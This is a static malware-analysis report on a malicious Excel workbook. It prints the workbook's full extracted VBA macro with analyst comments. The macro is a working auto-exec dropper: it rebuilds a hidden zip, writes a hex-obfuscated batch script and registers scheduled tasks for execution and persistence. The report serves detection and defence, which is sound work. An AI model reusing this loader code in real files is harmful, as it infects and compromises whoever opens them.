Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 aab04501b7af4c5a…

MALICIOUS

Office (OLE) / .XLS

3.48 MB Created: 2022-08-25 05:25:43 Authoring application: Microsoft Excel First seen: 2026-06-07
MD5: 2e992ef32ea6af5a98cf404121f6a3a0 SHA-1: afc15193e7c0c687551e92bba14d951123d5f03f SHA-256: aab04501b7af4c5a61eac16ff0a82ff1e28d2e3e6ee4f73b3789df22fb93d0c5
232 Risk Score

Heuristics 8

  • ClamAV: Xls.Malware.Sload-7135989-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Sload-7135989-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — the pairing is what flags macro documents whose visible VBA source is unavailable (p-code only, or source extraction failed). The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8880 bytes
SHA-256: bf7872eb19b6c875cbd6eb088873593dae4437bd75ded7799798d2a68e41a4cf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
' Auto-exec entry point: runs as soon as macros are enabled on open
' (heuristic OLE_VBA_WBOPEN). Despite the variable names, the path checked
' is a file, not a folder. Dir() with vbDirectory returns "" when
' dnds.zip is absent; only then is the dropper chain started
' (dodo -> file -> the two scheduled-task subs). When the archive is
' already on disk it just shows a message box, which presumably acts as a
' re-run guard — TODO confirm against the dropped archive.
Dim strFolderName As String
Dim strFolderExists As String

    strFolderName = "C:\Users\Public\Downloads\dnds.zip"
    strFolderExists = Dir(strFolderName, vbDirectory)

    If strFolderExists = "" Then
        Call dodo
    Else
        MsgBox "The File exists"
    End If
End Sub



Sub dodo()
' Stage 1: reconstructs C:\Users\Public\Downloads\dnds.zip from the
' UserForm "hohoyoyo". TextBox1.Text carries the archive as "*#&*"-separated
' decimal byte values (the "numeric char-array" shape named by heuristic
' OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER); each value is converted with CByte
' and appended to the file one byte at a time. Always continues to stage 2
' (Sub file) afterwards.
    Dim row As Long
    Dim path_file As String
    ' strUserName is never declared and never read again (dead statement;
    ' the module has no Option Explicit).
    strUserName = Application.UserName
    path_file = "C:\Users\Public\Downloads\dnds.zip"
    Dim ar() As String
    ' Only writes the archive when it is not already present.
    If Len(Dir(path_file)) = 0 Then
        ar = Split(hohoyoyo.TextBox1.Text, "*#&*")
        ' fileNum is declared but the code uses the literal channel #1.
        Dim fileNum As Integer
        ' Binary mode; Seek to LOF(1)+1 positions the write at end of file.
        Open path_file For Binary As #1
        Seek #1, LOF(1) + 1
        For row = LBound(ar) To UBound(ar)
            Put #1, , CByte(ar(row))
      Next
        Close #1
      End If
      ' Stage 2: drop the batch script and register the scheduled tasks.
      Call file
End Sub
Sub file()
' Stage 2: drops the batch script that unpacks dnds.zip. Every path,
' command and COM ProgID is hex-encoded and decoded at runtime through
' HexToString so none of them appears in the macro source (heuristic
' OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER). The decoded value of each literal is
' given in the comments below. fso and oFile are never declared (no Option
' Explicit). Artifacts to look for: C:\Users\Public\Downloads\sdns.txt,
' sdns.bat, %temp%\_.vbs, and a cscript child of the batch file.

' Ensures "C:\Users\Public\Downloads\" exists.
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(HexToString("433a5c55736572735c5075626c69635c446f776e6c6f6164735c")) Then
fso.CreateFolder (HexToString("433a5c55736572735c5075626c69635c446f776e6c6f6164735c"))
End If
' Creates "C:\Users\Public\Downloads\sdns.txt"; it is renamed to .bat below.
Set oFile = fso.CreateTextFile(HexToString("433a5c55736572735c5075626c69635c446f776e6c6f6164735c73646e732e747874"))
' Batch body, one decoded line per WriteLine:
' "@ECHO off"
oFile.WriteLine (HexToString("404543484f206f6666"))
' "setlocal"
oFile.WriteLine (HexToString("7365746c6f63616c"))
' "CD /d %~dp0"
oFile.WriteLine (HexToString("4344202f6420257e647030"))
' "CALL :UnZipFile "C:\Users\Public\Downloads" "C:\Users\Public\Downloads\dnds.zip""
oFile.WriteLine (HexToString("43414c4c203a556e5a697046696c652022433a5c55736572735c5075626c69635c446f776e6c6f616473222022433a5c55736572735c5075626c69635c446f776e6c6f6164735c646e64732e7a697022"))
' "EXIT /b"
oFile.WriteLine (HexToString("45584954202f62"))
' ":UnZipFile <ExtractTo> <newzipfile>"  -- the subroutine label
oFile.WriteLine (HexToString("3a556e5a697046696c65203c45787472616374546f3e203c6e65777a697066696c653e"))
' "SET vbs="%temp%\_.vbs""
oFile.WriteLine (HexToString("534554207662733d222574656d70255c5f2e76627322"))
' "IF EXIST %vbs% DEL /f /q %vbs%"
oFile.WriteLine (HexToString("49462045584953542025766273252044454c202f66202f71202576627325"))
' The next nine lines ECHO a VBScript into %temp%\_.vbs that creates the
' target folder if needed and extracts the zip with
' Shell.Application.NameSpace(...).CopyHere:
' ">%vbs% ECHO Set fso = CreateObject("Scripting.FileSystemObject")"
oFile.WriteLine (HexToString("3e2576627325204543484f205365742066736f203d204372656174654f626a6563742822536372697074696e672e46696c6553797374656d4f626a6563742229"))
' ">>%vbs% ECHO If NOT fso.FolderExists(%1) Then"
oFile.WriteLine (HexToString("3e3e2576627325204543484f204966204e4f542066736f2e466f6c64657245786973747328253129205468656e"))
' ">>%vbs% ECHO fso.CreateFolder(%1)"
oFile.WriteLine (HexToString("3e3e2576627325204543484f2066736f2e437265617465466f6c64657228253129"))
' ">>%vbs% ECHO End If"
oFile.WriteLine (HexToString("3e3e2576627325204543484f20456e64204966"))
' ">>%vbs% ECHO set objShell = CreateObject("Shell.Application")"
oFile.WriteLine (HexToString("3e3e2576627325204543484f20736574206f626a5368656c6c203d204372656174654f626a65637428225368656c6c2e4170706c69636174696f6e2229"))
' ">>%vbs% ECHO set FilesInZip=objShell.NameSpace(%2).items"
oFile.WriteLine (HexToString("3e3e2576627325204543484f207365742046696c6573496e5a69703d6f626a5368656c6c2e4e616d655370616365282532292e6974656d73"))
' ">>%vbs% ECHO objShell.NameSpace(%1).CopyHere(FilesInZip)"
oFile.WriteLine (HexToString("3e3e2576627325204543484f206f626a5368656c6c2e4e616d655370616365282531292e436f7079486572652846696c6573496e5a697029"))
' ">>%vbs% ECHO Set fso = Nothing"
oFile.WriteLine (HexToString("3e3e2576627325204543484f205365742066736f203d204e6f7468696e67"))
' ">>%vbs% ECHO Set objShell = Nothing"
oFile.WriteLine (HexToString("3e3e2576627325204543484f20536574206f626a5368656c6c203d204e6f7468696e67"))
' "cscript //nologo %vbs%"  -- runs the generated VBScript
oFile.WriteLine (HexToString("63736372697074202f2f6e6f6c6f676f202576627325"))
' "IF EXIST %vbs% DEL /f /q %vbs%"  -- removes the helper script again
oFile.WriteLine (HexToString("49462045584953542025766273252044454c202f66202f71202576627325"))
' "schtasks /delete /tn  Syn_NAS /f"  -- deletes the task that launched this batch
oFile.WriteLine (HexToString("7363687461736b73202f64656c657465202f746e202053796e5f4e4153202f66"))
' "ren C:\Users\Public\Downloads\snoop snoop.bat"  -- presumably a file
' extracted from dnds.zip; it is the action of the second task "Syn_HDD"
oFile.WriteLine (HexToString("72656e20433a5c55736572735c5075626c69635c446f776e6c6f6164735c736e6f6f7020736e6f6f702e626174"))
' "exit"
oFile.WriteLine (HexToString("65786974"))
oFile.Close
Set fso = Nothing
Set oFile = Nothing

   ' Renames "...\Downloads\sdns.txt" to "...\Downloads\sdns.bat"
   ' (Name statement split over two lines with a continuation).
   Name (HexToString("433a5c55736572735c5075626c69635c446f776e6c6f6164735c73646e732e747874")) As _
   (HexToString("433a5c55736572735c5075626c69635c446f776e6c6f6164735c73646e732e626174"))
   
' Stage 3: register the scheduled tasks that execute the dropped batch files.
Call ikn1iJNyl4GwPbdEQmVAhRheUVCK15i
   End Sub

Public Function HexToString(ByVal HexToStr As String) As String
' Decodes a string of two-character hex pairs into the characters they
' encode (e.g. "41" -> "A"). Pairs are read left to right; a trailing odd
' character is handed to Val on its own, exactly as Mid$ returns it, and a
' non-hex pair yields Chr$(0) because Val("&H...") evaluates to 0.
' This is the decoder the loader uses to keep every path and command
' literal out of the macro source.
Dim pos     As Long
Dim decoded As String
    pos = 1
    Do While pos <= Len(HexToStr)
        decoded = decoded & Chr$(Val("&H" & Mid$(HexToStr, pos, 2)))
        pos = pos + 2
    Loop
    HexToString = decoded
End Function
Sub ikn1iJNyl4GwPbdEQmVAhRheUVCK15i()
' Stage 3a: execution/persistence through the Task Scheduler 2.0 COM API
' (Schedule.Service). Registers a one-shot, time-triggered task named
' "Syn_NAS" that runs C:\Users\Public\Downloads\sdns.bat about 40 s after
' the macro runs, then chains to the sibling sub that registers "Syn_HDD".
' The registration text ("Start Wordpad at a certain time" / "Author Name")
' is left over from a generic scripting example and does not describe the
' task. service is never declared (no Option Explicit).
' Detection: task registration of Syn_NAS / Syn_HDD, or any task whose
' action path is under C:\Users\Public\Downloads, originating from Excel.
' TASK_TRIGGER_TIME
Const TriggerTypeTime = 1

' TASK_ACTION_EXEC
Const ActionTypeExec = 0

Set service = CreateObject("Schedule.Service")
Call service.Connect

Dim rootFolder
Set rootFolder = service.GetFolder("\")

Dim taskDefinition

Set taskDefinition = service.NewTask(0)

Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Start Wordpad at a certain time"
regInfo.Author = "Author Name"

Dim principal
Set principal = taskDefinition.principal

' 3 = TASK_LOGON_INTERACTIVE_TOKEN: runs in the current user's interactive
' session with that user's token, no credentials needed.
principal.LogonType = 3

Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
' Run as soon as possible if the start time was missed (e.g. machine asleep).
settings.StartWhenAvailable = True
' The task stays visible in the Task Scheduler UI.
settings.Hidden = False

Dim triggers
Set triggers = taskDefinition.triggers

Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)

Dim startTime, endTime

' Note: the local "time" shadows VBA's built-in Time function.
Dim time
' Start window opens 40 s from now ...
time = DateAdd("s", 40, Now)
startTime = XmlTime(time)

' ... and closes 5 min from now ("n" = minutes in DateAdd).
time = DateAdd("n", 5, Now)
endTime = XmlTime(time)

trigger.StartBoundary = startTime
trigger.EndBoundary = endTime
trigger.ExecutionTimeLimit = "PT5M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True

Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
' The batch file written by Sub file (sdns.txt renamed to sdns.bat).
Action.Path = "C:\Users\Public\Downloads\sdns.bat"

' Flags 6 = TASK_CREATE_OR_UPDATE; user and password omitted;
' logon type 3 = TASK_LOGON_INTERACTIVE_TOKEN (matches principal above).
Call rootFolder.RegisterTaskDefinition( _
    "Syn_NAS", taskDefinition, 6, , , 3)
' Stage 3b: second task ("Syn_HDD") for snoop.bat, 15 s later.
Call ikn1iJNyl4GwPbdEQmVAhRheU
End Sub

Sub ikn1iJNyl4GwPbdEQmVAhRheU()
' Stage 3b: near-duplicate of the previous sub. Registers a one-shot
' time-triggered task "Syn_HDD" that runs
' C:\Users\Public\Downloads\snoop.bat about 55 s after the macro runs.
' The batch file run by "Syn_NAS" (see Sub file) renames
' ...\Downloads\snoop to snoop.bat and deletes the Syn_NAS task before this
' trigger fires, so snoop presumably comes out of dnds.zip — not visible
' here. Only the delay, the action path and the task name differ from the
' sibling sub; service is again undeclared.
' TASK_TRIGGER_TIME
Const TriggerTypeTime = 1

' TASK_ACTION_EXEC
Const ActionTypeExec = 0

Set service = CreateObject("Schedule.Service")
Call service.Connect

Dim rootFolder
Set rootFolder = service.GetFolder("\")

Dim taskDefinition

Set taskDefinition = service.NewTask(0)

Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
' Leftover sample text; does not describe the task.
regInfo.Description = "Start Wordpad at a certain time"
regInfo.Author = "Author Name"

Dim principal
Set principal = taskDefinition.principal

' 3 = TASK_LOGON_INTERACTIVE_TOKEN (interactive user's token, no credentials).
principal.LogonType = 3

Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False

Dim triggers
Set triggers = taskDefinition.triggers

Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)

Dim startTime, endTime

' Local "time" shadows VBA's built-in Time function.
Dim time
' Start window opens 55 s from now (15 s after Syn_NAS) ...
time = DateAdd("s", 55, Now)
startTime = XmlTime(time)

' ... and closes 5 min from now.
time = DateAdd("n", 5, Now)
endTime = XmlTime(time)

trigger.StartBoundary = startTime
trigger.EndBoundary = endTime
trigger.ExecutionTimeLimit = "PT5M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True

Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "C:\Users\Public\Downloads\snoop.bat"

' Flags 6 = TASK_CREATE_OR_UPDATE; logon type 3 = TASK_LOGON_INTERACTIVE_TOKEN.
Call rootFolder.RegisterTaskDefinition( _
    "Syn_HDD", taskDefinition, 6, , , 3)
End Sub

Function XmlTime(t)
' Formats a VBA date/time as "yyyy-mm-ddThh:mm:ss", the boundary format the
' Task Scheduler trigger properties expect. Month, day, hour, minute and
' second are zero-padded to two digits; the year is emitted as-is.
    Dim datePart, timePart
    datePart = Year(t) & "-" & TwoDigits(Month(t)) & "-" & TwoDigits(Day(t))
    timePart = TwoDigits(Hour(t)) & ":" & TwoDigits(Minute(t)) & _
        ":" & TwoDigits(Second(t))
    XmlTime = datePart & "T" & timePart
End Function

Private Function TwoDigits(n)
' Left-pads a component to exactly two characters: prefix "0", keep the
' last two (so 5 -> "05", 12 -> "12").
    TwoDigits = Right("0" & n, 2)
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "hohoyoyo"
Attribute VB_Base = "0{47230D4E-3860-4CFD-9901-F08061DC0669}{3A173ECD-7518-4AA7-A0C3-5E129271FF0F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub TextBox1_Change()
' Empty event stub. The UserForm "hohoyoyo" only serves as a container:
' dodo() reads hohoyoyo.TextBox1.Text as the encoded dnds.zip payload.

End Sub

Private Sub TextBox3_Change()
' Empty event stub; TextBox3 is not referenced elsewhere in this listing.

End Sub